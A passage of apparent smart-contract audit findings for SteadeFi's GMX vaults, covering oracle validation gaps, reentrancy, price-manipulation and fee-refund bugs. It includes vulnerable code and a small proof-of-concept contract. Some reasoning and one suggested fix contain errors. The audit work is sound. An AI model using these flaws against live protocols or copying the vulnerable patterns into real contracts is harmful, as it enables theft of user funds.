funds of the strategy vault are unprotected against MEV bots.ч```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n -A bad price can be delivered in ChainlinkARBOracleчlowчWhen the `consultIn18Decimals()` is called, can be returned a negative value. 
Because no correct validation exists for a negative response.\\nThe `ChainlinkARBOracle.sol` has to guarantee that a correct price is delivered. However, there is a potential scenario in which this guarantee may be broken.\\nLet's break down each part of this scenario:\\nWhen `consultIn18Decimals()` is called, it calls `consult()`; this function is in charge of verifying each answer and delivering a price that is not stale, not zero and non-negative, and of guaranteeing that the sequencer is up.\\nPossible scenario in `consult()`: for the moment, we have: `chainlinkResponse.answer = x where x > 0` `prevChainlinkResponse.answer = y where y < 0` This is a negative value given by Chainlink\\n`_chainlinkIsFrozen()` passes correctly\\n`_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)` evaluates the following functions:\\n`_badChainlinkResponse(currentResponse)` passes correctly.\\n`_badChainlinkResponse(prevResponse)` also passes correctly because it only checks whether the value is zero, but not whether it is negative; see: `if (response.answer == 0) { return true; }`\\n_badPriceDeviation(currentResponse, prevResponse, token): `if( currentResponse.answer > prevResponse.answer)` remember `currentResponse.answer = x where x > 0 and prevResponse.answer = y where y < 0` So x > y. This condition is passed successfully.\\nFor the evaluation of `_deviation` we have: `_deviation = uint256(currentResponse.answer - prevResponse.answer) * SAFE_MULTIPLIER / uint256(prevResponse.answer); The result will always return zero.
So validation on` _badPriceDeviationof_deviation > maxDeviations[token]always returnsfalsebecause zero can never be greater for any number ofmaxDeviations[token]since it only accepts numbers `of` typeuint256 `\\nPOC :\\nThis scenario is illustrated in a minimalist example, which you can use in Remix:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.21;\\n\\nimport { SafeCast } from \"@openzeppelin/contracts/utils/math/SafeCast.sol\";\\n\\nerror BrokenTokenPriceFeed();\\n\\ncontract PassWithNegativePrice {\\n\\n using SafeCast for int256;\\n\\n uint256 public maxDeviations;\\n int256 public currentResponse;\\n int256 public prevResponse;\\n uint8 public decimal;\\n \\n constructor(int256 _currentResponse, int256 _prevResponse, uint8 _decimal,uint256 _maxDeviation ) {\\n currentResponse = _currentResponse; // _currentResponse > 0 e.g. 2000, 3, 90000000000000\\n prevResponse = _prevResponse; // _prevResponse < 0 e.g. -3000, -1 \\n decimal = _decimal; // _decimal can be 8, 18\\n maxDeviations = _maxDeviation; // any value\\n } \\n \\n // You call this function, result is currentResponse but doesn't matter maxDeviations value\\n function consultIn18Decimals() external view returns (uint256) {\\n \\n (int256 _answer, uint8 _decimals) = consult();\\n\\n return _answer.toUint256() * 1e18 / (10 ** _decimals);\\n }\\n\\n function consult() internal view returns (int256, uint8) { \\n\\n if (_badPriceDeviation(currentResponse, prevResponse) )revert BrokenTokenPriceFeed();\\n\\n return (currentResponse, decimal);\\n }\\n\\n function _badPriceDeviation(int256 _currentResponse, int256 _prevResponse ) internal view returns (bool) {\\n // Check for a deviation that is too large\\n uint256 _deviation;\\n\\n if (_currentResponse > _prevResponse) { // Here is our scene, always result be zero with negative value of _prevResponse\\n _deviation = uint256(_currentResponse - _prevResponse) * 1e18 / uint256(_prevResponse);\\n } else {\\n _deviation = 
uint256(_prevResponse - _currentResponse) * 1e18 / uint256(_prevResponse);\\n }\\n\\n return _deviation > maxDeviations;\\n }\\n\\n\\n}\\n```\\nчThis behavior can be mitigated by setting the correct conditional:\\n```\\nif (response.answer <= 0) { return true; }\\n```\\n\\nAlso,due of only consultIn18Decimals() is the function that is called for the protocol. Visibility to \"consult\" may be restricted. Change from \"public\" to \"internal\".чHigh, the base protocol is how you get the price of the securities. The answer may be different than what is allowed. Because the maximum deviations will not be counted.ч```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.21;\\n\\nimport { SafeCast } from \"@openzeppelin/contracts/utils/math/SafeCast.sol\";\\n\\nerror BrokenTokenPriceFeed();\\n\\ncontract PassWithNegativePrice {\\n\\n using SafeCast for int256;\\n\\n uint256 public maxDeviations;\\n int256 public currentResponse;\\n int256 public prevResponse;\\n uint8 public decimal;\\n \\n constructor(int256 _currentResponse, int256 _prevResponse, uint8 _decimal,uint256 _maxDeviation ) {\\n currentResponse = _currentResponse; // _currentResponse > 0 e.g. 2000, 3, 90000000000000\\n prevResponse = _prevResponse; // _prevResponse < 0 e.g. 
-3000, -1 \\n decimal = _decimal; // _decimal can be 8, 18\\n maxDeviations = _maxDeviation; // any value\\n } \\n \\n // You call this function, result is currentResponse but doesn't matter maxDeviations value\\n function consultIn18Decimals() external view returns (uint256) {\\n \\n (int256 _answer, uint8 _decimals) = consult();\\n\\n return _answer.toUint256() * 1e18 / (10 ** _decimals);\\n }\\n\\n function consult() internal view returns (int256, uint8) { \\n\\n if (_badPriceDeviation(currentResponse, prevResponse) )revert BrokenTokenPriceFeed();\\n\\n return (currentResponse, decimal);\\n }\\n\\n function _badPriceDeviation(int256 _currentResponse, int256 _prevResponse ) internal view returns (bool) {\\n // Check for a deviation that is too large\\n uint256 _deviation;\\n\\n if (_currentResponse > _prevResponse) { // Here is our scene, always result be zero with negative value of _prevResponse\\n _deviation = uint256(_currentResponse - _prevResponse) * 1e18 / uint256(_prevResponse);\\n } else {\\n _deviation = uint256(_prevResponse - _currentResponse) * 1e18 / uint256(_prevResponse);\\n }\\n\\n return _deviation > maxDeviations;\\n }\\n\\n\\n}\\n```\\n -re-entrency possible on processWithdraw since external call is made before burning user's shares in Vaultчmediumчre-entrency possible on processWithdraw since external call is made before burning user's shares in Vault\\n```\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n self.WNT.withdraw(self.withdrawCache.tokensToUser);\\naudit transfer ETH and call (bool success, ) = self.withdrawCache.user.call{value: address(this).balance}(\"\");\\n require(success, \"Transfer failed.\");\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n 
self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n\\n // Burn user shares\\n burn is after self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXWithdraw.sol#L182-L197\\nSince the function is only accessible by keeper (likely a router), which from the example of the mockRouter, would bundle the withdraw and \"afterWithdrawalExecution\" together. However since the router is out-of-scope, and there is still a possible chance that the user can make use of the router to re-enter into the function (without re-entrency lock), and be able to drain more fund that he actually deserves. This is submitted as a medium risk.чburn user's share first, before executing external call at the end.чdrain of user funds.ч```\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n self.WNT.withdraw(self.withdrawCache.tokensToUser);\\naudit transfer ETH and call (bool success, ) = self.withdrawCache.user.call{value: address(this).balance}(\"\");\\n require(success, \"Transfer failed.\");\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n\\n // Burn user shares\\n burn is after self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n -min max price on getMarketTokenPrice is not utilized such that deposit and withdrawal can use the same price, leading to free tx for 
cost-free manipulationчmediumчmin max price on getMarketTokenPrice is not utilized such that deposit and withdrawal can use the same price, leading to free tx for cost-free manipulation\\nGMX provides getMarketTokenPrice on its synethicReader which leverages MarketUtils. It allows passing in index/long/short token price with min/max. The isDeposit flag would then be used to determine whether the min or max price would be used for calculating marketTokenPrice, this is important to always favor the protocol and prevent MEV.\\nHowever on the getMarketTokenInfo implemented in GMXOracle, it passes in the same price from the oracle to the min/max price for all long&short/lpToken. This implies the same pricing is used for both deposit and withdrawal, enabling user to freely deposit/withdraw without cost or slippage. Malicious users can use this to trigger rebalance, and hence deposit or withdrawal directly on GMX that benefit the attacker with the use of bundled tx.\\n```\\n function getMarketTokenPrice(\\n DataStore dataStore,\\n Market.Props memory market,\\n Price.Props memory indexTokenPrice,\\n Price.Props memory longTokenPrice,\\n Price.Props memory shortTokenPrice,\\n bytes32 pnlFactorType,\\n bool maximize\\n ) external view returns (int256, MarketPoolValueInfo.Props memory) {\\n return\\n MarketUtils.getMarketTokenPrice(\\n dataStore,\\n market,\\n indexTokenPrice,\\n longTokenPrice,\\n shortTokenPrice,\\n pnlFactorType,\\n maximize\\n );\\n }\\n```\\n\\nhttps://github.com/gmx-io/gmx-synthetics/blob/613c72003eafe21f8f80ea951efd14e366fe3a31/contracts/reader/Reader.sol#L187-L206чconsider adding a small fee(5bps) to buffer the price returned from `_getTokenPriceMinMaxFormatted` on both sides.чfree deposit and withdrawal due to the same token price is used for min or max price, which leading to the same marketTokenPrice calculation for deposit and withdrawal.ч```\\n function getMarketTokenPrice(\\n DataStore dataStore,\\n Market.Props memory market,\\n Price.Props 
memory indexTokenPrice,\\n Price.Props memory longTokenPrice,\\n Price.Props memory shortTokenPrice,\\n bytes32 pnlFactorType,\\n bool maximize\\n ) external view returns (int256, MarketPoolValueInfo.Props memory) {\\n return\\n MarketUtils.getMarketTokenPrice(\\n dataStore,\\n market,\\n indexTokenPrice,\\n longTokenPrice,\\n shortTokenPrice,\\n pnlFactorType,\\n maximize\\n );\\n }\\n```\\n -Chainlinks oracle feeds are not immutableчmediumчThat a chainlink oracle works does not mean it will be supported by chainlink in the future and keeps working, and it could also be possible that the address of the price feed changes. Therefore, it does not make sense to prevent price feed addresses from being updated, or removed, but the protocol prevents that.\\nThere is only one function inside ChainlinkARBOracle to update the price feed addresses:\\n```\\nfunction addTokenPriceFeed(address token, address feed) external onlyOwner {\\n if (token == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feed == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n\\n feeds[token] = feed;\\n}\\n```\\n\\nAs we can see it will only allow to set the price feed ones and revert if trying to update, or remove a price feed. Therefore, if chainlink changes something, or the owner accidentally set the wrong address, or the protocol no longer wants to support a price feed, it can not be removed, or updated.чChainlinks oracle feeds are not immutable\\nRemove this line:\\n```\\nif (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n```\\nчIt is not possible to remove price feeds which are no longer supported by chainlink, or update the addresses of price feeds. 
This can lead to a complete DoS of the underlying token.\\nAs this feeds mapping is also the only check of whether a token is valid when calling the oracle, and the feed cannot be removed, it will always pass this check even if the protocol no longer wishes to support this token:\\n```\\nfunction consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n // rest of code\\n}\\n```\\nч```\\nfunction addTokenPriceFeed(address token, address feed) external onlyOwner {\\n if (token == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feed == address(0)) revert Errors.ZeroAddressNotAllowed();\\n if (feeds[token] != address(0)) revert Errors.TokenPriceFeedAlreadySet();\\n\\n feeds[token] = feed;\\n}\\n```\\n -Unhandled DoS when access to Chainlink oracle is blockedчlowчIn certain exceptional scenarios, oracles may become temporarily unavailable. As a result, invoking the `latestRoundData` function could potentially revert without proper error handling.
For our current scenario:\\n\"While currently there's no whitelisting mechanism to allow or disallow contracts from reading prices, powerful multisigs can tighten these access controls. In other words, the multisigs can immediately block access to price feeds at will. Therefore, to prevent denial of service scenarios, it is recommended to query ChainLink price feeds using a defensive approach with Solidity's try/catch structure. In this way, if the call to the price feed fails, the caller contract is still in control and can handle any errors safely and explicitly\".\\nAs a result and taking into consideration the recommendation from OpenZepplin, it is essential to thoroughly tackle this matter within the codebase, as it directly relates to many functionalities of the system which are based on the oracle's output.\\nAnother example to check this vulnerability can be consulted in https://solodit.xyz/issues/m-18-protocols-usability-becomes-very-limited-when-access-to-chainlink-oracle-data-feed-is-blocked-code4rena-inverse-finance-inverse-finance-contest-git\\nAs previously discussed, to mitigate the potential risks related to a denial-of-service situation, it is recommended to implement a try-catch mechanism when querying Chainlink prices in the `_getChainlinkResponse` function within `ChainlinkARBOracle.sol` (link to code below). 
By adopting this approach, in case there's a failure in invoking the price feed, the caller contract retains control and can effectively handle any errors securely and explicitly.\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L188-L194\\n```\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n```\\nчUnhandled DoS when access to Chainlik oracle is blocked\\nWrap the invocation of the `latestRoundData()` function within a `try-catch` structure rather than directly calling it. In situations where the function call triggers a revert, the catch block can be utilized to trigger an alternative oracle or handle the error in a manner that aligns with the system's requirements.чIn the event of a malfunction or cessation of operation of a configured Oracle feed, attempting to check for the `latestRoundData` will result in a revert that must be managed manually by the system.ч```\\n (\\n uint80 _latestRoundId,\\n int256 _latestAnswer,\\n /* uint256 _startedAt */,\\n uint256 _latestTimestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).latestRoundData();\\n```\\n -`Compound()` will not work if there is only TokenA/TokenB in the trove.чmediumчThe compound() function is designed to deposit Long tokens, Short tokens, or airdropped ARB tokens to the GMX for compounding. However, it will only work if there is ARB token in the trove. If there are only Long/Short tokens in the trove without any ARB, the function will not work.\\nThe `compound()` function is intended to be called by the keeper once a day to deposit all the Long/Short or ARB tokens to the GMX for further compounding. 
However, the logic for depositing to the GMX is restricted by the condition that the trove must always hold an airdropped ARB token.\\nHere is the relevant code snippet from the GitHub repository:\\n```\\n//@audit compound if only ARB is there, what about tokenA and tokenB?\\nif (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nThe code checks if there is a positive `_tokenInAmt` (representing ARB tokens) and proceeds with the depositing and compounding logic. However, if there is no ARB token but only tokenA and tokenB in the trove, the compounding will not occur and the tokens will remain in the compoundGMX contract indefinitely.\\nIt is important to note that the airdrop of ARB tokens is a rare event, making it less likely for this condition to be met. 
Therefore, if there are no ARB tokens but a significant amount of tokenA and tokenB in the trove, the compounding will not take place.чTo mitigate this issue, it is important to always check if either tokenA/tokenB or ARB is present in the trove. If either of these is present, then proceed with the compound action. Otherwise, return.\\n```\\nif (_tokenInAmt > 0 || self.tokenA.balanceOf(address(this) > 0 || self.tokenB.balanceOf(address(this)) ) {\\n self.refundee = payable(msg.sender);\\n\\n self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\nчIf the compounding doesn't happen this could lead to the indirect loss of funds to the user and loss of gas for the keeper who always calls this function just to transfer tokens and check the balance of ARB.ч```\\n//@audit compound if only ARB is there, what about tokenA and tokenB?\\nif (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender);\\n\\n 
self.compoundCache.compoundParams = cp;\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenA.balanceOf(address(this))\\n )\\n + GMXReader.convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenB.balanceOf(address(this))\\n );\\n\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n self.compoundCache.depositValue,\\n cp.slippage\\n );\\n\\n _alp.executionFee = cp.executionFee;\\n\\n self.compoundCache.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n -Positions may be liquidated due to incorrect implementation of Oracle logicчmediumчSteadefi checks for historical data to make sure that last price update are within maximum delya allowed and in the range of maximum % deviation allowed.\\nBut checking the historical data is incorrect according to the chainlink docs which can damage some serious logic with in the protcol\\nVault calls ChainlinkARBOracle.consult(token) to get the fair price from chainlink oracle\\n```\\nFile:\\n\\n function consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, 
chainlinkResponse.roundId);//@audit incorrect way to get historical data\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L62\\nwhich calls an internal function `_getPrevChainlinkResponse()` and tries to fetch the previous roundId's price and other details\\n```\\n function _getPrevChainlinkResponse(address _feed, uint80 _currentRoundId) internal view returns (ChainlinkResponse memory) {\\n ChainlinkResponse memory _prevChainlinkResponse;\\n\\n (\\n uint80 _roundId,\\n int256 _answer,\\n /* uint256 _startedAt */,\\n uint256 _timestamp,\\n /* uint80 _answeredInRound */\\n ) = AggregatorV3Interface(_feed).getRoundData(_currentRoundId - 1);\\n\\n _prevChainlinkResponse.roundId = _roundId;\\n _prevChainlinkResponse.answer = _answer;\\n _prevChainlinkResponse.timestamp = _timestamp;\\n _prevChainlinkResponse.success = true;\\n\\n return _prevChainlinkResponse;\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/oracles/ChainlinkARBOracle.sol#L210\\nBut this is an incorrect way of fetching historical data. The Chainlink docs say: `Oracles provide periodic data updates to the aggregators. Data feeds are updated in rounds. Rounds are identified by their roundId, which increases with each new round. This increase may not be monotonic. Knowing the roundId of a previous round allows contracts to consume historical data.\\nThe examples in this document name the aggregator roundId as aggregatorRoundId to differentiate it from the proxy roundId.` check here\\nso it is not mandatory that there will be valid data for currentRoundId-1.
if there is no data for currentRoundId-1 then the `_badPriceDeviation(currChainlinkResponse,PrevResponse)` check here will return true. Hence the vault won't be able to get the price of the token at some specific timesчPositions may be liquidated due to incorrect implementation of Oracle logic\\nAs the Chainlink docs say, the increase in roundId may not be monotonic, so loop through the previous roundIds and fetch the previous roundId's data\\npseudo code\\n```\\n iterate (from roundId-1 until we get the first previous data corresponding to roundId){\\n if(data present for roundId){\\n fetch the data and return\\n }else{\\n again iterate to get the data\\n }\\n }\\n```\\nчIn the worst case the keeper won't be able to get the price of the token, so rebalancing and debt repayment won't be possible, leading to liquidation and breaking the most important factor of the protocol\\nAlmost 70% of vault actions are dependent on the price of a token, and not getting the price will make them inactive, affecting net APRч```\\nFile:\\n\\n function consult(address token) public view whenNotPaused returns (int256, uint8) {\\n address _feed = feeds[token];\\n\\n if (_feed == address(0)) revert Errors.NoTokenPriceFeedAvailable();\\n\\n ChainlinkResponse memory chainlinkResponse = _getChainlinkResponse(_feed);\\n ChainlinkResponse memory prevChainlinkResponse = _getPrevChainlinkResponse(_feed, chainlinkResponse.roundId);//@audit incorrect way to get historical data\\n if (_chainlinkIsFrozen(chainlinkResponse, token)) revert Errors.FrozenTokenPriceFeed();\\n if (_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)) revert Errors.BrokenTokenPriceFeed();\\n\\n return (chainlinkResponse.answer, chainlinkResponse.decimals);\\n }\\n```\\n -Incorrect Execution Fee Refund address on Failed Deposits or withdrawals in Strategy VaultsчhighчThe Strategy Vaults within the protocol use a two-step process for handling deposits/withdrawals via GMXv2.
A `createDeposit()` transaction is followed by a callback function (afterDepositExecution() or afterDepositCancellation()) based on the transaction's success. In the event of a failed deposit due to vault health checks, the execution fee refund is mistakenly sent to the depositor instead of the keeper who triggers the deposit failure process.\\nThe protocol handles the `deposit` through the `deposit` function, which uses several parameters including an execution fee that refunds any excess fees.\\n```\\nfunction deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n\\nstruct DepositParams {\\n // Address of token depositing; can be tokenA, tokenB or lpToken\\n address token;\\n // Amount of token to deposit in token decimals\\n uint256 amt;\\n // Minimum amount of shares to receive in 1e18\\n uint256 minSharesAmt;\\n // Slippage tolerance for adding liquidity; e.g. 3 = 0.03%\\n uint256 slippage;\\n // Execution fee sent to GMX for adding liquidity\\n uint256 executionFee;\\n }\\n```\\n\\nThe refund is intended for the message sender (msg.sender), which in the initial deposit case, is the depositor. 
This is established in the `GMXDeposit.deposit` function, where `self.refundee` is assigned to `msg.sender`.\\n```\\nfunction deposit(GMXTypes.Store storage self, GMXTypes.DepositParams memory dp, bool isNative) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n\\n _dc.depositKey = GMXManager.addLiquidity(self, _alp);\\n\\n self.depositCache = _dc;\\n\\n emit DepositCreated(_dc.user, _dc.depositParams.token, _dc.depositParams.amt);\\n }\\n```\\n\\nIf the deposit passes the GMX checks, the `afterDepositExecution` callback is triggered, leading to `vault.processDeposit()` to check the vault's health. A failure here updates the status to `GMXTypes.Status.Deposit_Failed`. The reversal process is then handled by the `processDepositFailure` function, which can only be called by keepers. 
They pay for the transaction's gas costs, including the execution fee.\\n```\\nfunction processDepositFailure(uint256 slippage, uint256 executionFee) external payable onlyKeeper {\\n GMXDeposit.processDepositFailure(_store, slippage, executionFee);\\n }\\n```\\n\\nIn `GMXDeposit.processDepositFailure`, `self.refundee` is not updated, resulting in any excess execution fees being incorrectly sent to the initial depositor, although the keeper paid for it.\\n```\\nfunction processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // If current LP amount is somehow less or equal to amount before, we do not remove any liquidity\\n if (GMXReader.lpAmt(self) <= self.depositCache.healthParams.lpAmtBefore) {\\n processDepositFailureLiquidityWithdrawal(self);\\n } else {\\n // Remove only the newly added LP amount\\n _rlp.lpAmt = GMXReader.lpAmt(self) - self.depositCache.healthParams.lpAmtBefore;\\n\\n // If delta strategy is Long, remove all in tokenB to make it more\\n // efficent to repay tokenB debt as Long strategy only borrows tokenB\\n if (self.delta == GMXTypes.Delta.Long) {\\n address[] memory _tokenASwapPath = new address[](1);\\n _tokenASwapPath[0] = address(self.lpToken);\\n _rlp.tokenASwapPath = _tokenASwapPath;\\n\\n (_rlp.minTokenAAmt, _rlp.minTokenBAmt) = GMXManager.calcMinTokensSlippageAmt(\\n self, _rlp.lpAmt, address(self.tokenB), address(self.tokenB), slippage\\n );\\n } else {\\n (_rlp.minTokenAAmt, _rlp.minTokenBAmt) = GMXManager.calcMinTokensSlippageAmt(\\n self, _rlp.lpAmt, address(self.tokenA), address(self.tokenB), slippage\\n );\\n }\\n\\n _rlp.executionFee = executionFee;\\n\\n // Remove liqudity\\n self.depositCache.withdrawKey = GMXManager.removeLiquidity(self, _rlp);\\n }\\n```\\n\\nThe same issue occurs in the `processWithdrawFailure` function where the excess fees will be sent to the 
initial user who called withdraw instead of the keeper.чThe `processDepositFailure` and `processWithdrawFailure` functions must be modified to update `self.refundee` to the current executor of the function, which, in the case of deposit or withdraw failure, is the keeper.\\n```\\nfunction processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n }\\n```\\n\\n```\\nfunction processWithdrawFailure(\\n GMXTypes.Store storage self,\\n uint256 slippage,\\n uint256 executionFee\\n ) external {\\n GMXChecks.beforeProcessAfterWithdrawFailureChecks(self);\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n }\\n```\\nчThis flaw causes a loss of funds for the keepers, negatively impacting the vaults. Users also inadvertently receive extra fees that are rightfully owed to the keepersч```\\nfunction deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n\\nstruct DepositParams {\\n // Address of token depositing; can be tokenA, tokenB or lpToken\\n address token;\\n // Amount of token to deposit in token decimals\\n uint256 amt;\\n // Minimum amount of shares to receive in 1e18\\n uint256 minSharesAmt;\\n // Slippage tolerance for adding liquidity; e.g. 3 = 0.03%\\n uint256 slippage;\\n // Execution fee sent to GMX for adding liquidity\\n uint256 executionFee;\\n }\\n```\\n -Users withdraw more assets than should when `mintFee` was called long agoчhighчThe amount of LP-tokens to withdraw is calculated at the `GMXWithdraw.withdraw` before the `mintFee` function is called. The `mintFee` function increases the `totalSupply` amount. This way users receive more tokens than should be at the current timestamp. 
